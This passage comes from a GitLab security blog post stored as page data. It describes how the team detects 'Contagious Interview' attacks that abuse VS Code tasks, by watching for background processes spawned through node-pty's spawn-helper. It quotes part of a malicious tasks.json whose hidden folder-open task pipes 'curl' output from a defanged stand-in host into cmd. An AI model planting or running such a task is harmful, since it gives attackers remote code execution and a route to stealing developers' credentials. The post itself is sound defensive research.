sh\"\n          },\n          \"windows\": {\n            \"command\": \"curl https://www.example[.]com/settings/windows?flag=8 | cmd\"\n          },\n          \"problemMatcher\": [],\n          \"presentation\": {\n            \"reveal\": \"never\",\n            \"echo\": false,\n            \"focus\": false,\n            \"close\": true,\n            \"panel\": \"dedicated\",\n            \"showReuseMessage\": false\n          },\n          \"runOptions\": {\n            \"runOn\": \"folderOpen\"\n          }\n        }\n      ]\n    ```\n\n\n    This malicious code 
execution is then typically used to deploy infostealers, steal passwords and cryptocurrency, and ultimately establish persistence to abuse victims’ trusted accesses to corporate networks.\n\n\n    Once we understood how the threat actor was gaining initial code execution, we had a target for preventative measures to catch these attacks before GitLab workstations were targeted.\n\n\n    ## Multi-faceted detection and prevention\n\n\n    We always want to develop detective and preventative controls that are as “low level” as possible, since these types of detections are typically more difficult to bypass. Additionally, threat intelligence indicated that other projects that forked VS Code are also vulnerable to this malicious repository attack. So, instead of focusing specifically on a VS Code detection, we wanted to find the area “closest to the operating system” where this malicious code execution could be identified. This would allow our detection techniques to detect not only exploitation via VS Code tasks, but also attacks that use a VS Code fork or a similar Node-based IDE with background tasks.  \n       \n    Reviewing VS Code source, we identified that the `node-pty.spawn()` library call is used across the product when subprocesses need to be spawned. The [node-pty library](https://www.npmjs.com/package/node-pty) is incredibly popular, with over a million weekly downloads at time of writing. This library enables Node applications (including Electron applications such as VS Code) to fork subprocesses from a node context, and results in calls to its own binary, `spawn-helper`. 
When subprocesses are launched, `spawn-helper` is spawned as a child process of the Node application calling it.\n\n\n    After performing a Purple Team operation to emulate this specific attack path, we reviewed our Endpoint Detection and Response (EDR) telemetry to try to not only develop a strong detection for the emulated attack, but also to tune this detection to only alert on suspicious activity, and not on legitimate developer activity. We identified that `spawn-helper` is called in situations where VS Code wants to spawn tasks that occur in the *background*, without user visibility or interaction. Conversely, a `Code Helper` binary is called when new processes (such as the integrated Terminal) are launched in the *foreground* with user interaction.\n\n\n    This allows us to craft detections that only look for subprocesses spawned without the user’s knowledge, and avoid false positives that flag subprocesses a user might intentionally spawn while using their IDE.\n\n\n    As shown earlier, a commonly-seen malicious task contains commands that run a `curl | \u003Cshell>` from a task. Although `curl | bash` can be a legitimate way to install software like Homebrew, in our environment, it should never happen in the background without the user’s knowledge. This distinction allowed us to tune `spawn-helper`\\-based detections to not alert on *every* background task that ran, but to instead trigger only on behaviors that are uncommon and suspicious in our environment. 
Since implementing this detection technique, we have had no false positives, even though a large part of our organization uses VS Code daily.\n\n\n    Although this article has focused on detecting `spawn-helper` in your environment, this is only one of many layers of defense that you can implement in your organization to prevent and detect these IDE task-based attacks.\n\n\n    In addition to using EDR instrumentation to detect a malicious task at runtime, you can proactively harden your fleet against this type of attack by pushing global configs to disable task runs in VS Code. If that is too disruptive to your developers, you can also scan your environment to enumerate how often users use trusted workspaces and trusted workspace folders within their typical VS Code usage, and run education campaigns to help inform the company about the risks posed by this Contagious Interview attack path.\n\n\n    ## Summary\n\n\n    GitLab Security Operations works around the clock to protect our customers and our company. With our tightly coupled security teams, we are able to produce actionable threat intelligence, leverage that threat intel to inform adversary emulation operations, and ultimately develop technical and procedural prevention and detection techniques that protect our customers and company.\n\n\n    As VS Code tasks continue to receive visibility in the security community, it’s possible that other threat actors will attempt to use this attack path for their own ends. We hope that this small example of the work we do to protect GitLab and our customers against Advanced Persistent Threats can inspire others to do the same, and to join us in our continued mission to disrupt these threat actors. 
\n\n\n    > Follow our innovation and research on our [Security Labs site](https://about.gitlab.com/blog/categories/security-labs/).\n  category: security-labs\n  tags:\n    - security\n    - security research\n    - product\n    - tutorial\nconfig:\n  featured: false\n  template: BlogPost\n  slug: how-to-detect-and-prevent-contagious-interview-ide-attacks\n",{"config":720,"title":697,"description":721},{"noIndex":11},"Learn how we built custom controls that detect and prevent malware campaigns like those used for Contagious Interview.","en-us/blog/how-to-detect-and-prevent-contagious-interview-ide-attacks",[712,724,714,715],"security-research",[712,713,714,715],"_u_KINomJDgQvUO5rmENdJEiV1SNGECCwjqthi_HDgw",[728,737,746,755,763,772,782,791,800],{"content":729,"config":735},{"title":730,"heroImage":731,"category":10,"description":732,"authors":733},"Build an automated detection testing framework with GitLab CI/CD and Duo","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","Learn how GitLab's Signals Engineering team built the WATCH framework to continuously validate our security monitoring pipeline.",[734],"Evan Baltman",{"externalUrl":-1,"slug":736},"automated-detection-testing-framework",{"content":738,"config":744},{"title":739,"heroImage":740,"category":10,"description":741,"authors":742},"Pipeline security lessons from March supply chain incidents","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png","Learn how centralized pipeline policies can detect and block the patterns behind a series of recent attacks.",[743],"Grant Hickman",{"externalUrl":-1,"slug":745},"pipeline-security-lessons-from-march-supply-chain-incidents",{"content":747,"config":753},{"title":748,"heroImage":749,"category":10,"description":750,"authors":751},"Automating detection gap analysis with GitLab Duo Agent 
Platform","https://res.cloudinary.com/about-gitlab-com/image/upload/v1773147991/op5xyroonltdwqix0x3u.png","Learn how GitLab's Signals Engineering team uses our AI platform to automatically surface detection gaps from security incidents — no manual review required.",[752],"Matt Coons",{"externalUrl":-1,"slug":754},"automating-detection-gap-analysis-with-gitlab-duo-agent-platform",{"content":756,"config":761},{"title":757,"heroImage":740,"category":10,"description":758,"authors":759},"How GitLab built a security control framework from scratch","GitLab's Security Compliance team created a custom control framework to scale across multiple certifications and products — here's why and how you can, too.\n",[760],"Davoud Tu",{"externalUrl":-1,"slug":762},"how-gitlab-built-a-security-control-framework-from-scratch",{"content":764,"config":770},{"title":765,"heroImage":766,"category":10,"description":767,"authors":768},"GitLab Threat Intelligence Team reveals North Korean tradecraft","https://res.cloudinary.com/about-gitlab-com/image/upload/v1751464282/r2ovpvmizpkcngy9kzqu.png","Gain threat intelligence about North Korea’s Contagious Interview and fake IT worker campaigns and learn how GitLab disrupted their operations.",[769],"Oliver Smith",{"externalUrl":-1,"slug":771},"gitlab-threat-intelligence-reveals-north-korean-tradecraft",{"content":773,"config":780},{"title":774,"heroImage":775,"category":10,"description":776,"authors":777},"GitLab discovers widespread npm supply chain attack","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg","Malware driving attack includes \"dead man's switch\" that can harm user data.",[778,779],"Michael Henriksen","Daniel Abeles",{"externalUrl":-1,"slug":781},"gitlab-discovers-widespread-npm-supply-chain-attack",{"content":783,"config":789},{"title":784,"heroImage":785,"category":10,"description":786,"authors":787},"How to transform compliance observation management with 
GitLab","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675154/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","Learn how GitLab's Security Compliance team improved observation management using the DevSecOps platform, enhancing visibility, collaboration, and accountability.",[788],"Madeline Lake",{"externalUrl":-1,"slug":790},"how-to-transform-compliance-observation-management-with-gitlab",{"content":792,"config":798},{"title":793,"heroImage":794,"category":10,"description":795,"authors":796},"Self-service security alert handling with GitLab's UAM","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662080/Blog/Hero%20Images/AdobeStock_1097303277.jpg","The User Attestation Module automates security alerts by routing them directly to team members for verification, reducing manual SecOps work and enhancing audit trails.",[797,752],"Bala Allam",{"externalUrl":-1,"slug":799},"self-service-security-alert-handling-with-gitlabs-uam",{"content":801,"config":807},{"title":802,"heroImage":803,"category":10,"description":804,"authors":805},"How GitLab measures Red Team impact: The adoption rate metric","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663239/Blog/Hero%20Images/AdobeStock_1023776629.jpg","Follow our journey to develop and implement better metrics, including how we used GitLab to track our results end-to-end. Also find out the lessons learned along the way.",[806],"Chris Moberly",{"externalUrl":-1,"slug":808},"how-gitlab-measures-red-team-impact-the-adoption-rate-metric",1777934808097]